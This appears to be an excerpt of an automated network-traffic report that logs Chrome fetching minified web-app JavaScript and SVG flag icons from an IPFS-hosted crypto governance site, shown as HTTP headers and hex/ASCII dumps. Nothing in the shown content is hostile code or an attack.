                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 33 36 70 78 22 2c 62 61 63 6b 67 72 6f 75 6e 64 3a 55 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 22 64 61 72 6b 22 3d 3d 3d 55 2e 70 61 6c 65 74 74 65 2e 6d 6f 64 65 3f 22 72 67 62 61 28 32 33 35 2c 20 32 33 35 2c 20 32 33 37 2c 20 30 2e 31 32 29 22 3a 22 23 31 42 32 30 33 30 22 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 36 70 78 22 2c 6d 61 72 67 69 6e 54 6f 70 3a 22 31 36 70 78 22 2c 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 3a 22 31 32 70 78 22 2c 70 61 64 64 69 6e 67 3a 22 32 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 49 2e 6a 73 78 29 28 44 2e 5a 2c 7b 76 61 6c 75 65 3a 42 2e 56 33 2c 22 64 61 74
                                                                                                                                                                                                                                                  Data Ascii: 100%",height:"36px",background:U.palette.primary.main,border:"1px solid ".concat("dark"===U.palette.mode?"rgba(235, 235, 237, 0.12)":"#1B2030"),borderRadius:"6px",marginTop:"16px",marginBottom:"12px",padding:"2px"},children:[(0,I.jsx)(D.Z,{value:B.V3,"dat
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 20 73 3d 6b 28 65 29 2c 6f 3d 73 2e 6d 61 72 6b 65 74 2c 61 3d 73 2e 6e 65 74 77 6f 72 6b 2c 6e 3d 79 28 6f 2e 6d 61 72 6b 65 74 54 69 74 6c 65 29 3b 72 65 74 75 72 6e 28 30 2c 49 2e 6a 73 78 73 29 28 67 2e 5a 2c 7b 22 64 61 74 61 2d 63 79 22 3a 22 6d 61 72 6b 65 74 53 65 6c 65 63 74 6f 72 5f 22 2e 63 6f 6e 63 61 74 28 65 29 2c 76 61 6c 75 65 3a 65 2c 73 78 3a 7b 22 2e 4d 75 69 4c 69 73 74 49 74 65 6d 49 63 6f 6e 2d 72 6f 6f 74 22 3a 7b 6d 69 6e 57 69 64 74 68 3a 22 75 6e 73 65 74 22 7d 2c 64 69 73 70 6c 61 79 3a 6f 2e 76 33 26 26 63 3d 3d 3d 42 2e 56 32 7c 7c 21 6f 2e 76 33 26 26 63 3d 3d 3d 42 2e 56 33 3f 22 6e 6f 6e 65 22 3a 22 66 6c 65 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 49 2e 6a 73 78 29 28 52 2c 7b 73 69 7a 65 3a 33 32 2c 6c 6f 67 6f
                                                                                                                                                                                                                                                  Data Ascii: s=k(e),o=s.market,a=s.network,n=y(o.marketTitle);return(0,I.jsxs)(g.Z,{"data-cy":"marketSelector_".concat(e),value:e,sx:{".MuiListItemIcon-root":{minWidth:"unset"},display:o.v3&&c===B.V2||!o.v3&&c===B.V3?"none":"flex"},children:[(0,I.jsx)(R,{size:32,logo
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 28 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 28 30 2c 61 2e 5a 29 28 65 2c 73 2c 6f 5b 73 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6f 29 29 3a 66 28 4f 62 6a 65 63 74 28 6f 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 73 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6f 2c 73 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65
                                                                                                                                                                                                                                                  Data Ascii: ((function(s){(0,a.Z)(e,s,o[s])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):f(Object(o)).forEach((function(s){Object.defineProperty(e,s,Object.getOwnPropertyDescriptor(o,s))}))}return e}({display:"fle
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 5a 29 28 65 2c 73 2c 6f 5b 73 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6f 29 29 3a 63 28 4f 62 6a 65 63 74 28 6f 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 73 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6f 2c 73 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 72 3d 28 30 2c 6e 2e 5a 50 29 28 64 2e 5a 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b
                                                                                                                                                                                                                                                  Data Ascii: Z)(e,s,o[s])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):c(Object(o)).forEach((function(s){Object.defineProperty(e,s,Object.getOwnPropertyDescriptor(o,s))}))}return e}var r=(0,n.ZP)(d.Z)((function(e){
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6e 20 6c 7d 7d 29 3b 76 61 72 20 61 3d 6f 28 35 39 34 39 39 29 2c 6e 3d 6f 28 38 31 37 31 39 29 2c 64 3d 6f 28 38 35 33 39 30 29 2c 74 3d 6f 28 38 35 38 39 33 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 73 26 26 28 61 3d 61 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 73 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 6f 2e 70 75 73
                                                                                                                                                                                                                                                  Data Ascii: n l}});var a=o(59499),n=o(81719),d=o(85390),t=o(85893);function c(e,s){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);s&&(a=a.filter((function(s){return Object.getOwnPropertyDescriptor(e,s).enumerable}))),o.pus
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6e 20 65 2e 74 72 61 63 6b 45 76 65 6e 74 7d 29 29 3b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 73 29 28 72 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 6e 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 67 72 61 64 69 65 6e 74 22 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 69 2e 42 70 2e 43 4f 4e 4e 45 43 54 5f 57 41 4c 4c 45 54 2c 7b 66 75 6e 6e 65 6c 3a 73 7d 29 2c 6f 28 21 30 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 72 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 43 6f 6e 6e 65 63 74 20 77 61 6c 6c 65 74 22 7d 29 7d 29 2c 28 30 2c 72 2e 6a 73 78 29 28 6d 2c 7b 7d 29 5d 7d 29 7d 7d 2c 34 31 30 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 73 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22
                                                                                                                                                                                                                                                  Data Ascii: n e.trackEvent}));return(0,r.jsxs)(r.Fragment,{children:[(0,r.jsx)(n.Z,{variant:"gradient",onClick:function(){d(i.Bp.CONNECT_WALLET,{funnel:s}),o(!0)},children:(0,r.jsx)(a.cC,{id:"Connect wallet"})}),(0,r.jsx)(m,{})]})}},41024:function(e,s,o){"use strict"


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  134192.168.2.549859209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC784OUTGET /icons/flags/es.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 203708
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreibcfnh7nubdddujdjt6iltdlclvpd3qhsd7swgeyhle7w2f2vkqyu"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/icons/flags/es.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeig3gyfey2cvkgtdeyklommqqwwsiwdiuxrnhyhxqmdojzxzf2p22a,bafybeih4p4nhrhou7h6t7ficolttjj57f6mutgszdzy3wyacr2i2nnc65m,bafkreibcfnh7nubdddujdjt6iltdlclvpd3qhsd7swgeyhle7w2f2vkqyu
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73311
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e480f9584376-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC10INData Raw: 3c 73 76 67 20 76 69 65 77 42
                                                                                                                                                                                                                                                  Data Ascii: <svg viewB
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6f 78 3d 22 30 20 30 20 32 30 20 31 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 31 2e 38 37 2d 31 2e 34 31 33 48 2d 32 2e 31 36 37 76 31 36 2e 38 32 36 48 32 31 2e 38 37 56 2d 31 2e 34 31 33 5a 22 20 66 69 6c 6c 3d 22 23 43 36 30 42 31 45 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 32 31 2e 38 37 20 32 2e 37 39 34 48 2d 32 2e 31 36 37 76 38 2e 34 31 33 48 32 31 2e 38 37 56 32 2e 37 39 33 5a 22 20 66 69 6c 6c 3d 22 23 46 46 43 34 30 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 2e 32 31 37 20 36 2e 30 36 34 73 2d 2e 30 31 36 20 30 2d 2e 30 32 35 2d 2e 30 30 36 61 2e 33 38 2e 33 38 20 30 20 30 20 31 2d 2e 30 33 36 2d 2e 30 33
                                                                                                                                                                                                                                                  Data Ascii: ox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M21.87-1.413H-2.167v16.826H21.87V-1.413Z" fill="#C60B1E"/><path d="M21.87 2.794H-2.167v8.413H21.87V2.793Z" fill="#FFC400"/><path d="M3.217 6.064s-.016 0-.025-.006a.38.38 0 0 1-.036-.03
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 30 20 31 2d 2e 30 31 36 2e 30 32 38 6c 2d 2e 30 32 2e 30 33 33 2d 2e 30 32 36 2e 30 32 31 63 2d 2e 30 30 37 2e 30 31 32 2d 2e 30 32 37 2e 30 32 39 2d 2e 30 34 2e 30 32 39 5a 6d 2d 2e 32 35 38 2d 2e 30 33 38 61 31 2e 33 36 32 20 31 2e 33 36 32 20 30 20 30 20 31 20 2e 32 35 36 2e 30 33 31 2e 30 36 2e 30 36 20 30 20 30 20 30 20 2e 30 32 39 2d 2e 30 31 33 6c 2e 30 32 36 2d 2e 30 32 2e 30 32 2d 2e 30 33 34 2e 30 31 35 2d 2e 30 32 38 61 2e 30 35 33 2e 30 35 33 20 30 20 30 20 30 20 30 2d 2e 30 33 33 63 30 2d 2e 30 30 34 2d 2e 30 30 33 2d 2e 30 30 37 2d 2e 30 30 33 2d 2e 30 31 2d 2e 30 30 34 2d 2e 30 30 37 2d 2e 30 30 36 2d 2e 30 31 38 2d 2e 30 31 2d 2e 30 32 34 2d 2e 30 31 2d 2e 30 31 33 2d 2e 30 32 2d 2e 30 32 37 2d 2e 30 33 36 2d 2e 30 33 38 61 2e 31 37 36 2e
                                                                                                                                                                                                                                                  Data Ascii: 0 1-.016.028l-.02.033-.026.021c-.007.012-.027.029-.04.029Zm-.258-.038a1.362 1.362 0 0 1 .256.031.06.06 0 0 0 .029-.013l.026-.02.02-.034.015-.028a.053.053 0 0 0 0-.033c0-.004-.003-.007-.003-.01-.004-.007-.006-.018-.01-.024-.01-.013-.02-.027-.036-.038a.176.
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 2e 30 37 34 2e 30 31 36 2e 30 37 34 2e 30 31 36 2d 2e 30 32 37 2e 30 31 36 2d 2e 30 37 34 2d 2e 30 31 2d 2e 30 37 34 2d 2e 30 31 36 2d 2e 30 37 34 5a 22 20 66 69 6c 6c 3d 22 23 30 30 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 2e 34 36 34 20 35 2e 37 38 34 61 2e 30 33 2e 30 33 20 30 20 30 20 30 20 2e 30 32 39 2d 2e 30 33 2e 30 33 2e 30 33 20 30 20 30 20 30 2d 2e 30 32 39 2d 2e 30 33 2e 30 33 2e 30 33 20 30 20 30 20 30 2d 2e 30 32 38 2e 30 33 63 30 20 2e 30 31 37 2e 30 31 33 2e 30 33 2e 30 32 38 2e 30 33 5a 22 20 66 69 6c 6c 3d 22 23 43 38 42 31 30 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 2e 35 30 36 20 35 2e 37 34 36 76 2e 30 32 68 2d 2e 30 38 76 2d 2e 30 32 68 2e 30 32 38 76 2d 2e 30 34 34 68 2d 2e 30 32 56 35 2e 36 38 68 2e 30 32 76 2d 2e 30 32 68
                                                                                                                                                                                                                                                  Data Ascii: .074.016.074.016-.027.016-.074-.01-.074-.016-.074Z" fill="#000"/><path d="M3.464 5.784a.03.03 0 0 0 .029-.03.03.03 0 0 0-.029-.03.03.03 0 0 0-.028.03c0 .017.013.03.028.03Z" fill="#C8B100"/><path d="M3.506 5.746v.02h-.08v-.02h.028v-.044h-.02V5.68h.02v-.02h
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 2e 30 31 37 2e 30 31 32 2d 2e 30 32 33 2e 30 36 2d 2e 30 39 35 2e 31 34 2d 2e 31 35 32 2e 31 37 39 2d 2e 31 32 38 2e 30 31 2e 30 30 36 2e 30 31 32 2e 30 31 32 2e 30 31 36 2e 30 32 37 6c 2e 30 30 34 2e 30 31 2d 2e 30 31 2d 2e 30 30 36 63 2d 2e 30 30 36 2d 2e 30 30 34 2d 2e 30 33 36 2e 30 31 36 2d 2e 30 39 2e 30 38 36 6c 2d 2e 30 30 36 2e 30 35 31 2d 2e 30 30 37 2e 30 34 2e 30 30 32 2e 30 34 34 5a 6d 2d 2e 33 30 37 2d 2e 30 30 36 68 2e 33 30 31 6c 2e 30 30 34 2d 2e 30 33 38 2e 30 30 36 2d 2e 30 34 2e 30 30 36 2d 2e 30 35 34 63 2e 30 32 2d 2e 30 32 38 2e 30 36 38 2d 2e 30 38 37 2e 30 39 33 2d 2e 30 39 31 61 2e 30 33 37 2e 30 33 37 20 30 20 30 20 30 2d 2e 30 31 2d 2e 30 31 33 63 2d 2e 30 33 36 2d 2e 30 32 33 2d 2e 31 31 32 2e 30 33 34 2d 2e 31 37 2e 31 32 34
                                                                                                                                                                                                                                                  Data Ascii: .017.012-.023.06-.095.14-.152.179-.128.01.006.012.012.016.027l.004.01-.01-.006c-.006-.004-.036.016-.09.086l-.006.051-.007.04.002.044Zm-.307-.006h.301l.004-.038.006-.04.006-.054c.02-.028.068-.087.093-.091a.037.037 0 0 0-.01-.013c-.036-.023-.112.034-.17.124
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 2d 2e 30 30 37 2d 2e 30 30 36 2d 2e 30 31 2d 2e 30 31 33 2d 2e 30 31 33 61 2e 37 33 2e 37 33 20 30 20 30 20 30 2d 2e 32 31 34 2d 2e 30 32 38 63 2d 2e 30 38 34 20 30 2d 2e 31 37 2e 30 31 2d 2e 32 31 35 2e 30 32 38 61 2e 30 32 34 2e 30 32 34 20 30 20 30 20 30 2d 2e 30 31 33 2e 30 31 33 63 2d 2e 30 30 33 2e 30 31 33 2e 30 31 2e 30 32 2e 30 33 33 2e 30 32 37 2e 30 33 32 2e 30 30 38 2e 31 31 34 2e 30 32 2e 31 39 35 2e 30 32 5a 22 20 66 69 6c 6c 3d 22 23 43 38 42 31 30 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 2e 34 36 34 20 36 2e 32 32 32 61 31 2e 30 39 20 31 2e 30 39 20 30 20 30 20 31 2d 2e 31 39 35 2d 2e 30 32 63 2d 2e 30 33 32 2d 2e 30 31 2d 2e 30 33 36 2d 2e 30 32 34 2d 2e 30 33 36 2d 2e 30 33 34 2e 30 30 34 2d 2e 30 30 37 2e 30 30 37 2d 2e 30 31 33 2e
                                                                                                                                                                                                                                                  Data Ascii: -.007-.006-.01-.013-.013a.73.73 0 0 0-.214-.028c-.084 0-.17.01-.215.028a.024.024 0 0 0-.013.013c-.003.013.01.02.033.027.032.008.114.02.195.02Z" fill="#C8B100"/><path d="M3.464 6.222a1.09 1.09 0 0 1-.195-.02c-.032-.01-.036-.024-.036-.034.004-.007.007-.013.
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 38 2d 2e 30 31 33 6c 2e 30 30 34 2d 2e 30 30 33 2e 30 30 33 2e 30 30 33 73 2e 30 31 33 2e 30 31 37 2e 30 33 32 2e 30 32 31 63 2e 30 32 20 30 20 2e 30 34 32 2d 2e 30 32 2e 30 34 32 2d 2e 30 32 6c 2e 30 30 36 2d 2e 30 30 34 2e 30 30 34 2e 30 30 36 73 2e 30 30 36 2e 30 32 37 2e 30 32 36 2e 30 33 63 2e 30 32 32 2e 30 30 34 2e 30 33 38 2d 2e 30 30 37 2e 30 33 38 2d 2e 30 30 37 68 2e 30 30 34 6c 2e 30 32 2e 30 32 31 68 2e 30 30 34 6c 2d 2e 30 31 35 2e 30 31 32 5a 6d 2d 2e 32 34 36 2d 2e 30 34 63 2e 30 39 20 30 20 2e 31 37 36 2e 30 31 2e 32 34 2e 30 33 6c 2e 30 30 34 2d 2e 30 31 31 2d 2e 30 31 36 2d 2e 30 31 33 61 2e 30 36 2e 30 36 20 30 20 30 20 31 2d 2e 30 34 32 2e 30 30 37 63 2d 2e 30 32 2d 2e 30 30 34 2d 2e 30 32 38 2d 2e 30 32 31 2d 2e 30 33 32 2d 2e 30 33
                                                                                                                                                                                                                                                  Data Ascii: 8-.013l.004-.003.003.003s.013.017.032.021c.02 0 .042-.02.042-.02l.006-.004.004.006s.006.027.026.03c.022.004.038-.007.038-.007h.004l.02.021h.004l-.015.012Zm-.246-.04c.09 0 .176.01.24.03l.004-.011-.016-.013a.06.06 0 0 1-.042.007c-.02-.004-.028-.021-.032-.03
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 31 2d 2e 30 31 36 2d 2e 30 31 2d 2e 30 33 32 2d 2e 30 33 38 2d 2e 30 33 32 2d 2e 30 33 38 6c 2e 30 30 33 2d 2e 30 31 33 2e 30 32 36 2e 30 32 37 63 2e 30 31 36 2e 30 31 37 2e 30 32 39 2e 30 31 33 2e 30 32 39 2e 30 31 33 61 2e 30 32 35 2e 30 32 35 20 30 20 30 20 30 20 2e 30 31 36 2d 2e 30 32 33 56 36 2e 30 32 6c 2e 30 30 36 2e 30 31 63 2e 30 30 36 2e 30 31 2e 30 31 36 2e 30 31 33 2e 30 32 38 2e 30 31 33 2e 30 32 20 30 20 2e 30 33 36 2d 2e 30 31 33 2e 30 33 36 2d 2e 30 33 33 20 30 2d 2e 30 30 37 20 30 2d 2e 30 31 2d 2e 30 30 34 2d 2e 30 31 37 6c 2e 30 30 36 2d 2e 30 31 33 2e 30 31 33 2e 30 31 33 76 2e 30 30 34 63 30 20 2e 30 32 2e 30 31 36 2e 30 33 37 2e 30 33 36 2e 30 33 37 2e 30 32 20 30 20 2e 30 33 32 2d 2e 30 31 33 2e 30 33 35 2d 2e 30 33 76 2d 2e 30 31
                                                                                                                                                                                                                                                  Data Ascii: 1-.016-.01-.032-.038-.032-.038l.003-.013.026.027c.016.017.029.013.029.013a.025.025 0 0 0 .016-.023V6.02l.006.01c.006.01.016.013.028.013.02 0 .036-.013.036-.033 0-.007 0-.01-.004-.017l.006-.013.013.013v.004c0 .02.016.037.036.037.02 0 .032-.013.035-.03v-.01
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 2e 30 35 20 30 20 30 20 31 2d 2e 30 34 32 2d 2e 30 32 2e 30 35 34 2e 30 35 34 20 30 20 30 20 31 2d 2e 30 34 32 2e 30 32 2e 30 35 33 2e 30 35 33 20 30 20 30 20 31 2d 2e 30 33 36 2d 2e 30 31 33 2e 30 36 2e 30 36 20 30 20 30 20 31 2d 2e 30 34 32 2e 30 31 37 2e 30 35 33 2e 30 35 33 20 30 20 30 20 31 2d 2e 30 33 36 2d 2e 30 31 33 2e 30 35 33 2e 30 35 33 20 30 20 30 20 31 2d 2e 30 34 38 2e 30 32 37 63 2d 2e 30 31 20 30 2d 2e 30 31 36 2d 2e 30 30 33 2d 2e 30 32 32 2d 2e 30 30 36 61 2e 30 34 34 2e 30 34 34 20 30 20 30 20 31 2d 2e 30 32 33 2e 30 32 63 2e 30 30 34 20 30 20 2e 30 30 34 2e 30 30 32 20 30 20 2e 30 30 32 5a 6d 2d 2e 30 35 34 2d 2e 30 35 33 63 2e 30 30 34 2e 30 30 36 2e 30 32 2e 30 32 37 2e 30 32 38 2e 30 33 34 2e 30 30 37 2e 30 30 33 2e 30 32 2e 30 31
                                                                                                                                                                                                                                                  Data Ascii: .05 0 0 1-.042-.02.054.054 0 0 1-.042.02.053.053 0 0 1-.036-.013.06.06 0 0 1-.042.017.053.053 0 0 1-.036-.013.053.053 0 0 1-.048.027c-.01 0-.016-.003-.022-.006a.044.044 0 0 1-.023.02c.004 0 .004.002 0 .002Zm-.054-.053c.004.006.02.027.028.034.007.003.02.01
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 2e 39 39 37 2e 39 39 37 20 30 20 30 20 30 2d 2e 32 34 37 2e 30 33 63 2d 2e 30 30 33 20 30 2d 2e 30 31 2d 2e 30 30 34 2d 2e 30 31 2d 2e 30 30 37 20 30 2d 2e 30 30 34 2e 30 30 34 2d 2e 30 31 2e 30 30 37 2d 2e 30 31 61 2e 38 30 35 2e 38 30 35 20 30 20 30 20 31 20 2e 32 35 2d 2e 30 33 34 2e 38 2e 38 20 30 20 30 20 31 20 2e 32 34 38 2e 30 33 34 63 2e 30 30 34 20 30 20 2e 30 30 37 2e 30 30 36 2e 30 30 37 2e 30 31 73 2d 2e 30 30 37 2e 30 30 37 2d 2e 30 31 2e 30 30 37 61 31 2e 30 32 33 20 31 2e 30 32 33 20 30 20 30 20 30 2d 2e 32 34 35 2d 2e 30 33 5a 22 20 66 69 6c 6c 3d 22 23 43 38 42 31 30 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 2e 32 31 35 20 36 2e 31 30 32 63 2d 2e 30 30 36 20 30 2d 2e 30 31 2d 2e 30 30 34 2d 2e 30 31 32 2d 2e 30 31 56 36 2e 30 38 63 2e
                                                                                                                                                                                                                                                  Data Ascii: .997.997 0 0 0-.247.03c-.003 0-.01-.004-.01-.007 0-.004.004-.01.007-.01a.805.805 0 0 1 .25-.034.8.8 0 0 1 .248.034c.004 0 .007.006.007.01s-.007.007-.01.007a1.023 1.023 0 0 0-.245-.03Z" fill="#C8B100"/><path d="M3.215 6.102c-.006 0-.01-.004-.012-.01V6.08c.


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  135192.168.2.549861209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC784OUTGET /icons/flags/fr.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
